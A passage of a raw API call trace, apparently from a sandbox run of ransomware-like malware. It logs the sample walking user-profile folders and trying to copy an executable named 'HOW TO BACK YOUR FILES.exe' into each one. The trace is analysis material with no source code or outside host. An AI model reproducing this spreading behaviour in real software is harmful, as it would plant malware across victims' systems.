ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.695] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.695] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.696] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0065.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.696] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned 107 [0065.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0065.696] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.696] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.696] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.696] GetLastError () returned 0x0 [0065.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.696] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.697] CloseHandle (hObject=0x120) returned 1 [0065.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.697] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.697] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.697] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.697] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.697] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0065.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5fc0 | out: hHeap=0x2b0000) returned 1 [0065.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.697] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned 99 [0065.697] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0065.697] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.697] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.698] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.698] GetLastError () returned 0x0 [0065.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.698] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.698] CloseHandle (hObject=0x120) returned 1 [0065.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.698] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.698] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.698] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.698] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.698] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.698] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned 107 [0065.698] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.699] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.699] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.699] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.699] GetLastError () returned 0x0 [0065.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.699] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.699] CloseHandle (hObject=0x120) returned 1 [0065.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.699] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.700] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.700] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.700] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb408 | out: hHeap=0x2b0000) returned 1 [0065.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.700] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned 116 [0065.700] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.700] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.700] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.700] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.701] GetLastError () returned 0x0 [0065.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.701] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.701] CloseHandle (hObject=0x120) returned 1 [0065.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.701] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.701] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.704] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.706] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.706] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.706] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.706] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.706] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 116 [0065.706] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.706] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.706] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.707] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.707] GetLastError () returned 0x0 [0065.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.707] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.707] CloseHandle (hObject=0x120) returned 1 [0065.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.707] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.707] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.707] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.707] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.707] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5fd8 | out: hHeap=0x2b0000) returned 1 [0065.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.707] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 116 [0065.707] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.707] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.708] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.708] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.708] GetLastError () returned 0x0 [0065.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.708] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.708] CloseHandle (hObject=0x120) returned 1 [0065.708] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.708] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.709] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.709] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.709] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.709] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 116 [0065.709] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.709] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.709] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.710] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.710] GetLastError () returned 0x0 [0065.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.710] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.710] CloseHandle (hObject=0x120) returned 1 [0065.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.710] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.710] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.710] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.710] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.710] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" [0065.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0065.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0065.711] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft") returned 80 [0065.711] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" [0065.711] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.711] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.711] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 